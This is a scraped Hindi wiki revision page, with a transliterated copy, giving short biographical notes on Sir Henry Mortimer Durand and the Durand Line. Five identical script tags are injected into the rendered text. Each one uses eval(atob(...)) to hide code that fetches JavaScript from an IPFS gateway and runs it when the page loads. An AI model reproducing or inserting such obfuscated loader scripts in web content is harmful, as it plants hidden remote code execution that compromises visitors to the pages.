Difference between revisions of "मार्टीमेर डुरंड"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
Line 1: Line 1:
*सर हेनरी मार्टीमेर डुरंड ने 1873 ई. में 23 वर्ष की आयु में इंडियन सिविल सर्विस में प्रवेश किया।  
+
*'''सर हेनरी मार्टीमेर डुरंड''' ने 1873 ई. में 23 वर्ष की आयु में इंडियन सिविल सर्विस में प्रवेश किया।  
 
*सर हेनरी मार्टीमेर डुरंड के पिता सर हेनरी मेरियन डुरंड था, जो [[अखण्डित बंगाल|बंगाल]] इंजीनियर्स का अफ़सर होकर [[भारत]] आया और 1870 ई. में [[पंजाब]] का गवर्नर हो गया। लेकिन 1871 ई. में एक दुर्घटना में उसकी मृत्यु हो गई।  
 
*सर हेनरी मार्टीमेर डुरंड के पिता सर हेनरी मेरियन डुरंड था, जो [[अखण्डित बंगाल|बंगाल]] इंजीनियर्स का अफ़सर होकर [[भारत]] आया और 1870 ई. में [[पंजाब]] का गवर्नर हो गया। लेकिन 1871 ई. में एक दुर्घटना में उसकी मृत्यु हो गई।  
 
*हेनरी मार्टीमेर डुरंड 1879 ई. में [[काबुल]] अभियान के दौरान सर फ़्रेडरिक राबर्टस का राजनीतिक सचिव था।  
 
*हेनरी मार्टीमेर डुरंड 1879 ई. में [[काबुल]] अभियान के दौरान सर फ़्रेडरिक राबर्टस का राजनीतिक सचिव था।  
 
*1884 ई. में वह भारत सरकार का विदेश सचिव हो गया और इस पद पर 1894 ई. तक रहा।  
 
*1884 ई. में वह भारत सरकार का विदेश सचिव हो गया और इस पद पर 1894 ई. तक रहा।  
 
*1893 ई. में एक ब्रिटिश प्रतिनिधि दल के साथ [[अफ़ग़ानिस्तान]] के अमीर अब्दुर्रहमान के पास जाकर सर हेनरी मार्टीमेर डुरंड ने बड़ी चतुराई के साथ अमीर को एक सीमा आयोग की स्थापना के लिए राजी कर लिया। सर हेनरी मार्टीमेर डुरंड ही इस आयोग का अध्यक्ष नियुक्त किया गया। इस आयोग ने प्रसिद्ध डुरंड रेखा को निर्धारित की जो भारत और अफ़ग़ानिस्तान के बीच स्थायी सीमा बनी।  
 
*1893 ई. में एक ब्रिटिश प्रतिनिधि दल के साथ [[अफ़ग़ानिस्तान]] के अमीर अब्दुर्रहमान के पास जाकर सर हेनरी मार्टीमेर डुरंड ने बड़ी चतुराई के साथ अमीर को एक सीमा आयोग की स्थापना के लिए राजी कर लिया। सर हेनरी मार्टीमेर डुरंड ही इस आयोग का अध्यक्ष नियुक्त किया गया। इस आयोग ने प्रसिद्ध डुरंड रेखा को निर्धारित की जो भारत और अफ़ग़ानिस्तान के बीच स्थायी सीमा बनी।  
*[[पाकिस्तान]] आज भी डुरंड रेखा को पाकिस्तान और अफ़ग़ानिस्तान के बीच की सीमा रेखा बनाये रखने पर बल देता है।
+
*[[पाकिस्तान]] आज भी डुरंड रेखा को पाकिस्तान और अफ़ग़ानिस्तान के बीच की सीमा रेखा बनाये रखने पर बल देता है।<ref>पुस्तक 'भारतीय इतिहास कोश' पृष्ठ संख्या-183</ref>
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 15: Line 15:
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
पुस्तक 'भारतीय इतिहास कोश' पृष्ठ संख्या-183
+
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}

Revision as of 06:53, 7 April 2011

  • sar henari martimer durand ne 1873 ee. mean 23 varsh ki ayu mean iandiyan sivil sarvis mean pravesh kiya.
  • sar henari martimer durand ke pita sar henari meriyan durand tha, jo bangal ianjiniyars ka afasar hokar bharat aya aur 1870 ee. mean panjab ka gavarnar ho gaya. lekin 1871 ee. mean ek durghatana mean usaki mrityu ho gee.
  • henari martimer durand 1879 ee. mean kabul abhiyan ke dauran sar fredarik rabartas ka rajanitik sachiv tha.
  • 1884 ee. mean vah bharat sarakar ka videsh sachiv ho gaya aur is pad par 1894 ee. tak raha.
  • 1893 ee. mean ek british pratinidhi dal ke sath afaganistan ke amir abdurrahaman ke pas jakar sar henari martimer durand ne b di chaturaee ke sath amir ko ek sima ayog ki sthapana ke lie raji kar liya. sar henari martimer durand hi is ayog ka adhyaksh niyukt kiya gaya. is ayog ne prasiddh durand rekha ko nirdharit ki jo bharat aur afaganistan ke bich sthayi sima bani.
  • pakistan aj bhi durand rekha ko pakistan aur afaganistan ke bich ki sima rekha banaye rakhane par bal deta hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak 'bharatiy itihas kosh' prishth sankhya-183

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>